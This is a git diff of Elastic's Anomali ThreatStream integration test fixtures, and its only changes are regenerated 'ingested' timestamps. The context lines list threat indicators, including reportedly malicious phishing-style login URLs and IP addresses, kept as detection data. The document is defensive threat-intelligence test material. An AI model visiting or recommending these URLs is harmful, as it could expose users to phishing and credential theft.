"{\"created\":\"2020-02-25T02:54:48.929Z\",\"description\":\"TS ID: 55347597475; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--b7d14453-ad19-4246-961a-72f0e5136874\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:54:48.929Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:48.929Z\"}", "category": "threat", "type": "indicator", @@ -32149,7 +32149,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026815700Z", + "ingested": "2021-12-14T14:57:43.118477016Z", "original": "{\"created\":\"2020-02-25T02:54:54.632Z\",\"description\":\"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--064f2766-97b6-481d-a273-f80a97524be8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:54:54.632Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:54.632Z\"}", "category": "threat", "type": "indicator", @@ -32201,7 +32201,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026821700Z", + "ingested": "2021-12-14T14:57:43.118477599Z", "original": "{\"created\":\"2020-02-25T02:55:06.15Z\",\"description\":\"TS ID: 55347597650; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--3f3bca20-c218-431d-8250-0f600b011971\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:06.15Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.15Z\"}", "category": "threat", "type": "indicator", @@ -32253,7 +32253,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026825400Z", + "ingested": "2021-12-14T14:57:43.118478075Z", "original": "{\"created\":\"2020-02-25T02:55:06.186Z\",\"description\":\"TS ID: 55347597472; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--6b3d6689-75e8-4f50-a1c0-f1a1e6158493\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:55:06.186Z\",\"name\":\"mal_url: http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.186Z\"}", "category": "threat", "type": "indicator", @@ -32304,7 +32304,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026830500Z", + "ingested": "2021-12-14T14:57:43.118478453Z", "original": "{\"created\":\"2020-02-25T02:55:06.314Z\",\"description\":\"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1306883c-b911-4116-9121-492450e4bb07\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-25T02:55:06.314Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.314Z\"}", "category": "threat", "type": "indicator", @@ -32356,7 +32356,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026834500Z", + "ingested": "2021-12-14T14:57:43.118478848Z", "original": "{\"created\":\"2020-02-25T02:55:27.523Z\",\"description\":\"TS ID: 55347597627; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d4a02ea1-435f-472e-8013-07e4e24f5a2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:27.523Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/3/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/3/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:27.523Z\"}", "category": "threat", "type": "indicator", @@ -32408,7 +32408,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026838500Z", + "ingested": "2021-12-14T14:57:43.118479286Z", "original": "{\"created\":\"2020-02-25T02:55:35.424Z\",\"description\":\"TS ID: 55347597528; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--1e8d894d-1e8b-4ba9-ae25-1e3e00c055ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-25T02:55:35.424Z\",\"name\":\"mal_url: http://atomicwallet.email/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atomicwallet.email/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.424Z\"}", "category": "threat", "type": "indicator", @@ -32459,7 +32459,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026841800Z", + "ingested": "2021-12-14T14:57:43.118479686Z", "original": "{\"created\":\"2020-02-25T02:55:35.462Z\",\"description\":\"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--cb377636-13ce-421e-926f-e33e2b954263\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:55:35.462Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.462Z\"}", "category": "threat", "type": "indicator", @@ -32511,7 +32511,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026846600Z", + "ingested": "2021-12-14T14:57:43.118480064Z", "original": "{\"created\":\"2020-02-25T02:55:35.496Z\",\"description\":\"TS ID: 55347597477; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--1163cdee-566a-404a-b66e-657857eb4af3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:55:35.496Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.496Z\"}", "category": "threat", "type": "indicator", @@ -32556,7 +32556,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026873800Z", + "ingested": "2021-12-14T14:57:43.118480453Z", "original": "{\"created\":\"2020-02-25T02:55:39.691Z\",\"description\":\"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:39.691Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:39.691Z\"}", "category": "threat", "type": "indicator", diff --git a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json index 417299c68da..a4dfda6762f 100644 --- a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json +++ b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json @@ -55,7 +55,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809812200Z", + "ingested": "2021-12-14T14:58:45.613591778Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -117,7 +117,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809823Z", + "ingested": "2021-12-14T14:58:45.613594934Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -181,7 +181,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809830600Z", + "ingested": "2021-12-14T14:58:45.613595458Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -235,7 +235,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809835Z", + "ingested": "2021-12-14T14:58:45.613595839Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -299,7 +299,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809839700Z", + "ingested": "2021-12-14T14:58:45.613596321Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -363,7 +363,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809843800Z", + "ingested": "2021-12-14T14:58:45.613596702Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -417,7 +417,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809847900Z", + "ingested": "2021-12-14T14:58:45.613597090Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -478,7 +478,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809852100Z", + "ingested": "2021-12-14T14:58:45.613597519Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -539,7 +539,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809856200Z", + "ingested": "2021-12-14T14:58:45.613597905Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -602,7 +602,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809860200Z", + "ingested": "2021-12-14T14:58:45.613598366Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -657,7 +657,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809864300Z", + "ingested": "2021-12-14T14:58:45.613599459Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -713,7 +713,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809868400Z", + "ingested": "2021-12-14T14:58:45.613600105Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -776,7 +776,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809872800Z", + "ingested": "2021-12-14T14:58:45.613600553Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -830,7 +830,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809876900Z", + "ingested": "2021-12-14T14:58:45.613600955Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -887,7 +887,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809881Z", + "ingested": "2021-12-14T14:58:45.613601402Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -941,7 +941,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809885100Z", + "ingested": "2021-12-14T14:58:45.613601802Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -997,7 +997,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809889200Z", + "ingested": "2021-12-14T14:58:45.613602322Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1054,7 +1054,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809893200Z", + "ingested": "2021-12-14T14:58:45.613602822Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1110,7 +1110,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809898400Z", + "ingested": "2021-12-14T14:58:45.613603255Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1166,7 +1166,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809902700Z", + "ingested": "2021-12-14T14:58:45.613603634Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1221,7 +1221,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809907800Z", + "ingested": "2021-12-14T14:58:45.613604013Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1276,7 +1276,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809911900Z", + "ingested": "2021-12-14T14:58:45.613604436Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1334,7 +1334,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809917400Z", + "ingested": "2021-12-14T14:58:45.613604840Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1396,7 +1396,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809924700Z", + "ingested": "2021-12-14T14:58:45.613605393Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1451,7 +1451,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809929Z", + "ingested": "2021-12-14T14:58:45.613605831Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1508,7 +1508,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809934300Z", + "ingested": "2021-12-14T14:58:45.613606232Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1564,7 +1564,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809941900Z", + "ingested": "2021-12-14T14:58:45.613606668Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1618,7 +1618,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809947900Z", + "ingested": "2021-12-14T14:58:45.613607059Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1679,7 +1679,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.809953200Z", + "ingested": "2021-12-14T14:58:45.613607454Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1741,7 +1741,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809957500Z", + "ingested": "2021-12-14T14:58:45.613607885Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1797,7 +1797,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809962600Z", + "ingested": "2021-12-14T14:58:45.613608367Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1853,7 +1853,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.809966800Z", + "ingested": "2021-12-14T14:58:45.613608764Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1910,7 +1910,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809972700Z", + "ingested": "2021-12-14T14:58:45.613609157Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1966,7 +1966,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809979500Z", + "ingested": "2021-12-14T14:58:45.613609617Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2020,7 +2020,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.809983700Z", + "ingested": "2021-12-14T14:58:45.613610170Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2076,7 +2076,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.809988900Z", + "ingested": "2021-12-14T14:58:45.613610562Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2131,7 +2131,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810014300Z", + "ingested": "2021-12-14T14:58:45.613611007Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2186,7 +2186,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810019100Z", + "ingested": "2021-12-14T14:58:45.613611405Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2248,7 +2248,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810025100Z", + "ingested": "2021-12-14T14:58:45.613611819Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2302,7 +2302,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810033Z", + "ingested": "2021-12-14T14:58:45.613612209Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2356,7 +2356,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810040600Z", + "ingested": "2021-12-14T14:58:45.613612595Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2412,7 +2412,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810048100Z", + "ingested": "2021-12-14T14:58:45.613612970Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2475,7 +2475,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810052800Z", + "ingested": "2021-12-14T14:58:45.613613370Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2531,7 +2531,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810057700Z", + "ingested": "2021-12-14T14:58:45.613613759Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2594,7 +2594,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810062Z", + "ingested": "2021-12-14T14:58:45.613614151Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2655,7 +2655,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810066300Z", + "ingested": "2021-12-14T14:58:45.613614845Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2710,7 +2710,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810070600Z", + "ingested": "2021-12-14T14:58:45.613615286Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2765,7 +2765,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810074900Z", + "ingested": "2021-12-14T14:58:45.613615715Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2820,7 +2820,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810079200Z", + "ingested": "2021-12-14T14:58:45.613616152Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2876,7 +2876,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810083500Z", + "ingested": "2021-12-14T14:58:45.613616635Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2939,7 +2939,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810087900Z", + "ingested": "2021-12-14T14:58:45.613617143Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2993,7 +2993,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810092500Z", + "ingested": "2021-12-14T14:58:45.613617517Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3047,7 +3047,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810096800Z", + "ingested": "2021-12-14T14:58:45.613617960Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3101,7 +3101,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810101Z", + "ingested": "2021-12-14T14:58:45.613618395Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3162,7 +3162,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810121900Z", + "ingested": "2021-12-14T14:58:45.613618843Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3216,7 +3216,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810126100Z", + "ingested": "2021-12-14T14:58:45.613619227Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3271,7 +3271,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810148600Z", + "ingested": "2021-12-14T14:58:45.613619626Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3326,7 +3326,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810154Z", + "ingested": "2021-12-14T14:58:45.613620019Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3382,7 +3382,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810163400Z", + "ingested": "2021-12-14T14:58:45.613620425Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3437,7 +3437,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810167500Z", + "ingested": "2021-12-14T14:58:45.613620804Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3500,7 +3500,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810173600Z", + "ingested": "2021-12-14T14:58:45.613621197Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3554,7 +3554,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810179800Z", + "ingested": "2021-12-14T14:58:45.613621628Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3610,7 +3610,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810184Z", + "ingested": "2021-12-14T14:58:45.613622111Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3665,7 +3665,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810189300Z", + "ingested": "2021-12-14T14:58:45.613622490Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3721,7 +3721,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810196800Z", + "ingested": "2021-12-14T14:58:45.613622884Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3777,7 +3777,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810217700Z", + "ingested": "2021-12-14T14:58:45.613623296Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3833,7 +3833,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810222700Z", + "ingested": "2021-12-14T14:58:45.613623768Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3887,7 +3887,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810226800Z", + "ingested": "2021-12-14T14:58:45.613624164Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3949,7 +3949,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810232Z", + "ingested": "2021-12-14T14:58:45.613624567Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4004,7 +4004,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810236300Z", + "ingested": "2021-12-14T14:58:45.613624958Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4058,7 +4058,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810242700Z", + "ingested": "2021-12-14T14:58:45.613625336Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4112,7 +4112,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810248700Z", + "ingested": "2021-12-14T14:58:45.613625718Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4174,7 +4174,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810253100Z", + "ingested": "2021-12-14T14:58:45.613626203Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4228,7 +4228,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810258200Z", + "ingested": "2021-12-14T14:58:45.613626579Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4283,7 +4283,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810265800Z", + "ingested": "2021-12-14T14:58:45.613627105Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4337,7 +4337,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810270100Z", + "ingested": "2021-12-14T14:58:45.613627574Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4400,7 +4400,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810304900Z", + "ingested": "2021-12-14T14:58:45.613627968Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4454,7 +4454,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810313700Z", + "ingested": "2021-12-14T14:58:45.613628479Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4511,7 +4511,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810318200Z", + "ingested": "2021-12-14T14:58:45.613628865Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4573,7 +4573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810322300Z", + "ingested": "2021-12-14T14:58:45.613629312Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4641,7 +4641,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810327100Z", + "ingested": "2021-12-14T14:58:45.613629745Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4694,7 +4694,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810332900Z", + "ingested": "2021-12-14T14:58:45.613630551Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4748,7 +4748,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810338100Z", + "ingested": "2021-12-14T14:58:45.613630992Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4815,7 +4815,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810342800Z", + "ingested": "2021-12-14T14:58:45.613631373Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4877,7 +4877,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810346900Z", + "ingested": "2021-12-14T14:58:45.613631850Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4940,7 +4940,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810351Z", + "ingested": "2021-12-14T14:58:45.613632269Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5008,7 +5008,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810355Z", + "ingested": "2021-12-14T14:58:45.613632656Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5062,7 +5062,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810359100Z", + "ingested": "2021-12-14T14:58:45.613633036Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5123,7 +5123,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810363100Z", + "ingested": "2021-12-14T14:58:45.613633509Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5184,7 +5184,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810367300Z", + "ingested": "2021-12-14T14:58:45.613633908Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5250,7 +5250,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810371300Z", + "ingested": "2021-12-14T14:58:45.613634288Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5311,7 +5311,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810375700Z", + "ingested": "2021-12-14T14:58:45.613634674Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5364,7 +5364,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810379800Z", + "ingested": "2021-12-14T14:58:45.613635151Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5434,7 +5434,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810384100Z", + "ingested": "2021-12-14T14:58:45.613635536Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5482,7 +5482,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T08:39:43.810388200Z", + "ingested": "2021-12-14T14:58:45.613635911Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5532,7 +5532,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T08:39:43.810392300Z", + "ingested": "2021-12-14T14:58:45.613636296Z", "category": "threat", "type": "indicator", "kind": "enrichment" 